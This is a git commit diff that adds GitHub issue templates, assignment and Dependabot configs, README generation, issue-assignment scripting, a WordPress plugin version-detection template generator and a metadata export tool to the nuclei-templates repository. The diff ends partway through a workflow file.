parent
d3c7d73554
commit
129fae0047
|
@ -0,0 +1,14 @@
|
||||||
|
blank_issues_enabled: false
|
||||||
|
|
||||||
|
contact_links:
|
||||||
|
- name: Ask an question / advise on using nuclei-templates
|
||||||
|
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
|
||||||
|
about: Ask a question or request support for using nuclei-templates
|
||||||
|
|
||||||
|
- name: Share idea / feature to discuss for nuclei-templates
|
||||||
|
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
|
||||||
|
about: Share idea / feature to discuss for nuclei-templates
|
||||||
|
|
||||||
|
- name: Connect with PD Team & Community (Discord)
|
||||||
|
url: https://discord.gg/projectdiscovery
|
||||||
|
about: Connect with PD Team & Community for direct communication
|
|
@ -0,0 +1,21 @@
|
||||||
|
---
|
||||||
|
name: False Negative
|
||||||
|
about: 'Issue for template missing valid/expected result.'
|
||||||
|
labels: 'false-negative'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
### Nuclei Version:
|
||||||
|
|
||||||
|
<!-- You can find current version of nuclei with "nuclei -version" -->
|
||||||
|
|
||||||
|
### Template file:
|
||||||
|
|
||||||
|
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
|
||||||
|
|
||||||
|
### Command to reproduce:
|
||||||
|
|
||||||
|
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
|
||||||
|
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
|
|
@ -0,0 +1,24 @@
|
||||||
|
---
|
||||||
|
name: False Positive
|
||||||
|
about: 'Issue for template producing invalid/unexpected result.'
|
||||||
|
labels: 'false-positive'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
### Nuclei Version:
|
||||||
|
|
||||||
|
<!-- You can find current version of nuclei with "nuclei -version" -->
|
||||||
|
|
||||||
|
### Template file:
|
||||||
|
|
||||||
|
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
|
||||||
|
|
||||||
|
### Command to reproduce:
|
||||||
|
|
||||||
|
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
|
||||||
|
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
|
||||||
|
|
||||||
|
### Anything else:
|
||||||
|
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
|
|
@ -0,0 +1,18 @@
|
||||||
|
---
|
||||||
|
name: Feature request
|
||||||
|
about: Request feature to implement in this project
|
||||||
|
labels: 'Type: Enhancement'
|
||||||
|
---
|
||||||
|
|
||||||
|
<!--
|
||||||
|
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
|
||||||
|
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
|
||||||
|
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
|
||||||
|
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
|
||||||
|
-->
|
||||||
|
|
||||||
|
### Please describe your feature request:
|
||||||
|
<!-- A clear and concise description of feature to implement -->
|
||||||
|
|
||||||
|
### Describe the use case of this feature:
|
||||||
|
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->
|
|
@ -0,0 +1,21 @@
|
||||||
|
---
|
||||||
|
name: Issue report
|
||||||
|
about: "Issue to report invalid template"
|
||||||
|
labels: 'Type: Bug'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!--
|
||||||
|
1. Please search to see if an issue already exists for the bug you encountered.
|
||||||
|
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
|
||||||
|
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
|
||||||
|
-->
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
### Issue description:
|
||||||
|
<!-- A concise description of what you're experiencing. -->
|
||||||
|
|
||||||
|
|
||||||
|
### Anything else:
|
||||||
|
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
|
|
@ -0,0 +1,17 @@
|
||||||
|
---
|
||||||
|
name: Template Request
|
||||||
|
about: 'request for new template to be created.'
|
||||||
|
labels: 'new-template'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
|
||||||
|
### Template for?
|
||||||
|
|
||||||
|
<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
|
||||||
|
|
||||||
|
### Details:
|
||||||
|
|
||||||
|
<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->
|
|
@ -0,0 +1,23 @@
|
||||||
|
---
|
||||||
|
name: Template Contribution
|
||||||
|
about: Contributing nuclei template using GitHub Issue
|
||||||
|
labels: 'nuclei-template'
|
||||||
|
---
|
||||||
|
|
||||||
|
### Template Information:
|
||||||
|
|
||||||
|
<!-- Include basic information of the template including reference -->
|
||||||
|
<!-- Templates without any reference mostly likely to take more time for review/validation -->
|
||||||
|
|
||||||
|
|
||||||
|
### Nuclei Template:
|
||||||
|
|
||||||
|
<!-- Include nuclei template in between code block shared below -->
|
||||||
|
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
<!-- Include template results if available or redacted valid response snippet of valid match -->
|
||||||
|
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->
|
|
@ -0,0 +1,30 @@
|
||||||
|
# Set to true to add reviewers to pull requests
|
||||||
|
addReviewers: false
|
||||||
|
|
||||||
|
# Set to true to add assignees to pull requests
|
||||||
|
addAssignees: false
|
||||||
|
|
||||||
|
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||||
|
reviewers:
|
||||||
|
- ritikchaddha
|
||||||
|
- pussycat0x
|
||||||
|
- DhiyaneshGeek
|
||||||
|
|
||||||
|
# A number of reviewers added to the pull request
|
||||||
|
# Set 0 to add all the reviewers (default: 0)
|
||||||
|
numberOfReviewers: 1
|
||||||
|
|
||||||
|
# A list of assignees, overrides reviewers if set
|
||||||
|
assignees:
|
||||||
|
- pussycat0x
|
||||||
|
- ritikchaddha
|
||||||
|
- DhiyaneshGeek
|
||||||
|
|
||||||
|
# A number of assignees to add to the pull request
|
||||||
|
# Set to 0 to add all of the assignees.
|
||||||
|
# Uses numberOfReviewers if unset.
|
||||||
|
numberOfAssignees: 1
|
||||||
|
|
||||||
|
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||||
|
# skipKeywords:
|
||||||
|
# - wip
|
|
@ -0,0 +1,19 @@
|
||||||
|
# To get started with Dependabot version updates, you'll need to specify which
|
||||||
|
# package ecosystems to update and where the package manifests are located.
|
||||||
|
# Please see the documentation for all configuration options:
|
||||||
|
# https://help.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
|
||||||
|
|
||||||
|
version: 2
|
||||||
|
updates:
|
||||||
|
|
||||||
|
# Maintain dependencies for GitHub Actions
|
||||||
|
- package-ecosystem: "github-actions"
|
||||||
|
directory: "/"
|
||||||
|
schedule:
|
||||||
|
interval: "weekly"
|
||||||
|
target-branch: "main"
|
||||||
|
commit-message:
|
||||||
|
prefix: "chore"
|
||||||
|
include: "scope"
|
||||||
|
labels:
|
||||||
|
- "Type: Maintenance"
|
|
@ -1,4 +1,4 @@
|
||||||
|
f"""
|
||||||
|
|
||||||
<h1 align="center">
|
<h1 align="center">
|
||||||
Nuclei Templates
|
Nuclei Templates
|
||||||
|
@ -38,22 +38,9 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
<tr>
|
<tr>
|
||||||
<td>
|
<td>
|
||||||
|
|
||||||
## Nuclei Templates Top 10 statistics
|
{get_top10()}
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
**{command("tree", -2, None)}**.
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|
||||||
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
|
||||||
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
|
||||||
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
|
||||||
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
|
||||||
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
|
||||||
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
|
||||||
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
|
||||||
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
|
||||||
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
|
||||||
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
|
||||||
|
|
||||||
**534 directories, 7902 files**.
|
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
@ -94,3 +81,4 @@ Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be
|
||||||
|
|
||||||
|
|
||||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||||
|
"""
|
|
@ -0,0 +1,139 @@
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
|
||||||
|
# GitHub credentials
|
||||||
|
password = sys.argv[3]
|
||||||
|
|
||||||
|
repo_owner = "projectdiscovery"
|
||||||
|
repo_name = "nuclei-templates"
|
||||||
|
pr_user_list = ["DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
|
||||||
|
issue_user_list = ["princechaddha", "DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
|
||||||
|
|
||||||
|
headers = {'Authorization': f'Bearer {password}',
|
||||||
|
'Accept': 'application/vnd.github+json',
|
||||||
|
'X-GitHub-Api-Version': '2022-11-28'}
|
||||||
|
|
||||||
|
def get_issue_assignee(issue_number):
|
||||||
|
issue_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues?per_page=2"
|
||||||
|
response = requests.get(issue_url, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
issue_data = response.json()[1]
|
||||||
|
assignee = issue_data["assignee"]["login"] if issue_data["assignee"] else "None"
|
||||||
|
return assignee
|
||||||
|
else:
|
||||||
|
print(f"Failed to fetch assignee for issue #{issue_number}")
|
||||||
|
return None
|
||||||
|
|
||||||
|
def assign_issue_or_pr(user, issue_number):
|
||||||
|
url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues/{issue_number}/assignees"
|
||||||
|
data = { "assignees": [user] }
|
||||||
|
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||||
|
|
||||||
|
if response.status_code == 201:
|
||||||
|
print(f"Assigned issue #{issue_number} to {user}")
|
||||||
|
else:
|
||||||
|
print(f"Failed to assign issue #{issue_number} to {user}. Status code: {response.status_code}")
|
||||||
|
|
||||||
|
def get_pr_assignee_and_reviewer(pull_request_number):
|
||||||
|
pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls?per_page=2'
|
||||||
|
response = requests.get(pull_url, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
pull_request_data = response.json()[1]
|
||||||
|
assignee = pull_request_data['assignee']['login'] if pull_request_data['assignee'] else None
|
||||||
|
reviewers = [reviewer['login'] for reviewer in pull_request_data['requested_reviewers']]
|
||||||
|
|
||||||
|
return assignee, reviewers
|
||||||
|
else:
|
||||||
|
print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
|
||||||
|
return None, None
|
||||||
|
|
||||||
|
def get_pr_author(pull_request_number):
|
||||||
|
pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}'
|
||||||
|
response = requests.get(pull_url, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
pull_request_data = response.json()
|
||||||
|
author = pull_request_data['user']['login']
|
||||||
|
return author
|
||||||
|
|
||||||
|
else:
|
||||||
|
print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
|
||||||
|
return None
|
||||||
|
|
||||||
|
def review_pr(user, pull_request_number):
|
||||||
|
url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}/requested_reviewers'
|
||||||
|
data = { 'reviewers': [user] }
|
||||||
|
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||||
|
|
||||||
|
if response.status_code == 201:
|
||||||
|
print(f"Review request for pull request #{pull_request_number} sent to {user} successfully.")
|
||||||
|
else:
|
||||||
|
print(f"Failed to send review request for pull request #{pull_request_number}. Response: {response.text}")
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) != 4:
|
||||||
|
print("Usage: python assign_tasks.py <issue_number> <pr_or_issue> <token>")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
issue_number = int(sys.argv[1])
|
||||||
|
type_ = sys.argv[2]
|
||||||
|
if type_ == 'pr':
|
||||||
|
assignee, reviewers = get_pr_assignee_and_reviewer(issue_number - 1)
|
||||||
|
author = get_pr_author(issue_number)
|
||||||
|
|
||||||
|
if reviewers:
|
||||||
|
try:
|
||||||
|
index = pr_user_list.index(reviewers[0])
|
||||||
|
try:
|
||||||
|
reviewer = pr_user_list[index + 1]
|
||||||
|
except:
|
||||||
|
reviewer = pr_user_list[0]
|
||||||
|
if reviewer == author:
|
||||||
|
reviewer = pr_user_list(pr_user_list.index(reviewer) + 1)
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
else:
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
reviewer = pr_user_list[0]
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
else:
|
||||||
|
for user in pr_user_list:
|
||||||
|
if (user != author):
|
||||||
|
reviewer = user
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
break
|
||||||
|
|
||||||
|
if assignee:
|
||||||
|
try:
|
||||||
|
index = pr_user_list.index(assignee)
|
||||||
|
if (pr_user_list[index + 1] == reviewer):
|
||||||
|
assign_issue_or_pr(pr_user_list[index + 2], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(pr_user_list[index + 1], issue_number)
|
||||||
|
except Exception as e:
|
||||||
|
if (pr_user_list[0] == reviewer):
|
||||||
|
assign_issue_or_pr(pr_user_list[1], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(pr_user_list[0], issue_number)
|
||||||
|
else:
|
||||||
|
if (pr_user_list[0] == reviewer):
|
||||||
|
assign_issue_or_pr(pr_user_list[1], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(pr_user_list[0], issue_number)
|
||||||
|
elif type_ == 'issue':
|
||||||
|
assignee = get_issue_assignee(issue_number-1)
|
||||||
|
|
||||||
|
if assignee:
|
||||||
|
try:
|
||||||
|
index = issue_user_list.index(assignee)
|
||||||
|
assign_issue_or_pr(issue_user_list[index + 1], issue_number)
|
||||||
|
except Exception as e:
|
||||||
|
assign_issue_or_pr(issue_user_list[0], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(issue_user_list[0], issue_number)
|
||||||
|
|
||||||
|
main()
|
|
@ -0,0 +1,23 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
import glob
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
def countTpl(path):
|
||||||
|
return len(glob.glob(path + "/*.*"))
|
||||||
|
|
||||||
|
def command(args, start=None, end=None):
|
||||||
|
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
|
||||||
|
|
||||||
|
def get_top10():
|
||||||
|
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
|
||||||
|
TOP10 = command(["cat", "TOP-10.md"])
|
||||||
|
return HEADER + TOP10 if len(TOP10) > 0 else ""
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
version = command(["git", "describe", "--tags", "--abbrev=0"])
|
||||||
|
template = eval(open(".github/scripts/README.tmpl", "r").read())
|
||||||
|
|
||||||
|
print(template)
|
||||||
|
f = open("README.md", "w")
|
||||||
|
f.write(template)
|
||||||
|
f.close()
|
|
@ -0,0 +1,10 @@
|
||||||
|
beautifulsoup4==4.11.1
|
||||||
|
bs4==0.0.1
|
||||||
|
certifi==2023.7.22
|
||||||
|
charset-normalizer==2.1.1
|
||||||
|
idna==3.4
|
||||||
|
Markdown==3.4.1
|
||||||
|
requests==2.28.1
|
||||||
|
soupsieve==2.3.2.post1
|
||||||
|
termcolor==2.1.1
|
||||||
|
urllib3==1.26.13
|
|
@ -0,0 +1,185 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
'''
|
||||||
|
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
|
||||||
|
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
|
||||||
|
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
|
||||||
|
compares the detect version with the payload version.
|
||||||
|
|
||||||
|
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||||
|
|
||||||
|
e.g.
|
||||||
|
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||||
|
'''
|
||||||
|
|
||||||
|
__author__ = "ricardomaia"
|
||||||
|
|
||||||
|
from time import sleep
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
from markdown import markdown
|
||||||
|
import os
|
||||||
|
from termcolor import colored, cprint
|
||||||
|
|
||||||
|
# Regex to extract the name of th plugin from the URL
|
||||||
|
regex = r"https://wordpress.org/plugins/(\w.+)/"
|
||||||
|
|
||||||
|
ranking = 1
|
||||||
|
|
||||||
|
# Top 200 Wordpress Plugins
|
||||||
|
for page_number in range(1, 11):
|
||||||
|
|
||||||
|
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||||
|
"Accept-Language": "en-US,en;q=0.9",
|
||||||
|
"Accept-Encoding": "gzip, deflate",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Connection": "keep-alive",
|
||||||
|
"Upgrade-Insecure-Requests": "1",
|
||||||
|
"Cache-Control": "max-age=0",
|
||||||
|
"Pragma": "no-cache",
|
||||||
|
}).content
|
||||||
|
|
||||||
|
# Parse HTML
|
||||||
|
soup = BeautifulSoup(html, 'html.parser')
|
||||||
|
results = soup.find(id="main")
|
||||||
|
articles = results.find_all("article", class_="plugin-card")
|
||||||
|
|
||||||
|
# Setting the top tag
|
||||||
|
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
|
||||||
|
|
||||||
|
# Get each plugin in the page
|
||||||
|
for article in articles:
|
||||||
|
|
||||||
|
full_title = article.find("h3", class_="entry-title").get_text()
|
||||||
|
regex_remove_quotes = r"[\"`:]"
|
||||||
|
subst_remove_quotes = "'"
|
||||||
|
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
|
||||||
|
|
||||||
|
link = article.find("a").get("href")
|
||||||
|
name = re.search(regex, link).group(1)
|
||||||
|
|
||||||
|
cprint(f"Title: {title}", "cyan")
|
||||||
|
cprint(f"Link: {link}", "yellow")
|
||||||
|
cprint(f"Name: {name} - Ranking: {ranking}", "green")
|
||||||
|
print(f"Page Number: {page_number}")
|
||||||
|
print(f"Top Tag: {top_tag}")
|
||||||
|
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
|
||||||
|
ranking += 1
|
||||||
|
|
||||||
|
sleep(0.2)
|
||||||
|
|
||||||
|
# Get the readme.txt file from SVN
|
||||||
|
readme = requests.get(
|
||||||
|
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
|
||||||
|
headers={
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Accept-Encoding": "gzip, deflate",
|
||||||
|
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
|
||||||
|
"Cache-Control": "no-cache",
|
||||||
|
"Connection": "keep-alive",
|
||||||
|
"Host": "plugins.svn.wordpress.org",
|
||||||
|
"Pragma": "no-cache",
|
||||||
|
"Upgrade-Insecure-Requests": "1",
|
||||||
|
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
|
||||||
|
|
||||||
|
# Extract the plugin version
|
||||||
|
try:
|
||||||
|
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
|
||||||
|
readme.decode("utf-8")).group(1)
|
||||||
|
except:
|
||||||
|
version = "N/A"
|
||||||
|
|
||||||
|
# Extract the plugin description
|
||||||
|
try:
|
||||||
|
description_markdown = re.search(
|
||||||
|
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
|
||||||
|
html = markdown(description_markdown)
|
||||||
|
full_description = BeautifulSoup(html, 'html.parser').get_text()
|
||||||
|
regex_max_length = r"(\b.{80}\b)"
|
||||||
|
subst_max_lenght = "\\g<1>\\n "
|
||||||
|
description = re.sub(
|
||||||
|
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
|
||||||
|
except:
|
||||||
|
description = "N/A"
|
||||||
|
|
||||||
|
print(f"Version: {version}")
|
||||||
|
print(f"Description: {description}")
|
||||||
|
|
||||||
|
# Write the plugin template to file
|
||||||
|
template = f'''id: wordpress-{name}
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: {title} Detection
|
||||||
|
author: ricardomaia
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/{name}/
|
||||||
|
metadata:
|
||||||
|
plugin_namespace: {name}
|
||||||
|
wpscan: https://wpscan.com/plugin/{name}
|
||||||
|
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
|
||||||
|
path:
|
||||||
|
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
last_version: helpers/wordpress/plugins/{name}.txt
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
name: internal_detected_version
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: detected_version
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
name: "outdated_version"
|
||||||
|
dsl:
|
||||||
|
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
'''
|
||||||
|
|
||||||
|
work_dir = os.getcwd()
|
||||||
|
print(f"Current working directory: {work_dir}")
|
||||||
|
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||||
|
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
|
||||||
|
|
||||||
|
if not os.path.exists(helper_dir):
|
||||||
|
os.makedirs(helper_dir)
|
||||||
|
|
||||||
|
if not os.path.exists(template_dir):
|
||||||
|
os.makedirs(template_dir)
|
||||||
|
|
||||||
|
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||||
|
version_file = open(helper_path, "w")
|
||||||
|
version_file.write(version)
|
||||||
|
version_file.close()
|
||||||
|
|
||||||
|
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
|
||||||
|
template_file = open(template_path, "w") # Dev environment
|
||||||
|
template_file.write(template)
|
||||||
|
template_file.close()
|
||||||
|
|
||||||
|
print("--------------------------------------------")
|
||||||
|
print("\n")
|
|
@ -0,0 +1,108 @@
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"fmt"
|
||||||
|
"io/ioutil"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"gopkg.in/yaml.v3"
|
||||||
|
)
|
||||||
|
|
||||||
|
type Classification struct {
|
||||||
|
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type Info struct {
|
||||||
|
Name string `yaml:"name"`
|
||||||
|
Severity string `yaml:"severity"`
|
||||||
|
Description string `yaml:"description"`
|
||||||
|
Classification Classification `yaml:"classification,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type Data struct {
|
||||||
|
ID string `yaml:"id"`
|
||||||
|
Info Info `yaml:"info"`
|
||||||
|
FilePath string `json:"file_path"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
if len(os.Args) != 3 {
|
||||||
|
fmt.Println("Usage: go run main.go <directory1[,directory2,...]> <output_file>")
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
|
||||||
|
input := os.Args[1]
|
||||||
|
outputFile := os.Args[2]
|
||||||
|
var directories []string
|
||||||
|
|
||||||
|
// Check if the input contains a comma
|
||||||
|
if strings.Contains(input, ",") {
|
||||||
|
directories = strings.Split(input, ",")
|
||||||
|
} else {
|
||||||
|
directories = []string{input}
|
||||||
|
}
|
||||||
|
|
||||||
|
var data []Data
|
||||||
|
|
||||||
|
for _, directory := range directories {
|
||||||
|
fmt.Println("Generating data for", directory)
|
||||||
|
|
||||||
|
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error accessing path %s: %v\n", path, err)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||||
|
yamlFile, err := ioutil.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
var d Data
|
||||||
|
err = yaml.Unmarshal(yamlFile, &d)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if d.Info.Classification.CVSSScore == "" {
|
||||||
|
d.Info.Classification.CVSSScore = "N/A"
|
||||||
|
}
|
||||||
|
if d.Info.Classification == (Classification{}) {
|
||||||
|
d.Info.Classification.CVSSScore = "N/A"
|
||||||
|
}
|
||||||
|
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
|
||||||
|
d.FilePath = fpath
|
||||||
|
|
||||||
|
data = append(data, d)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
})
|
||||||
|
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error reading directory: %v\n", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var jsonData []byte
|
||||||
|
for _, d := range data {
|
||||||
|
temp, err := json.Marshal(d)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
jsonData = append(jsonData, temp...)
|
||||||
|
jsonData = append(jsonData, byte('\n'))
|
||||||
|
}
|
||||||
|
err := ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
|
||||||
|
fmt.Println("JSON data written to", outputFile)
|
||||||
|
}
|
|
@ -0,0 +1,31 @@
|
||||||
|
name: 🤖 issue/pr assignment
|
||||||
|
on:
|
||||||
|
pull_request:
|
||||||
|
types: [opened]
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
issues:
|
||||||
|
types: [opened]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
permissions: write-all
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
env:
|
||||||
|
ASSIGN_TASK_TOKEN: ${{ secrets.PDTEAMX_PAT }} # github personal token
|
||||||
|
steps:
|
||||||
|
- name: checkout repo content
|
||||||
|
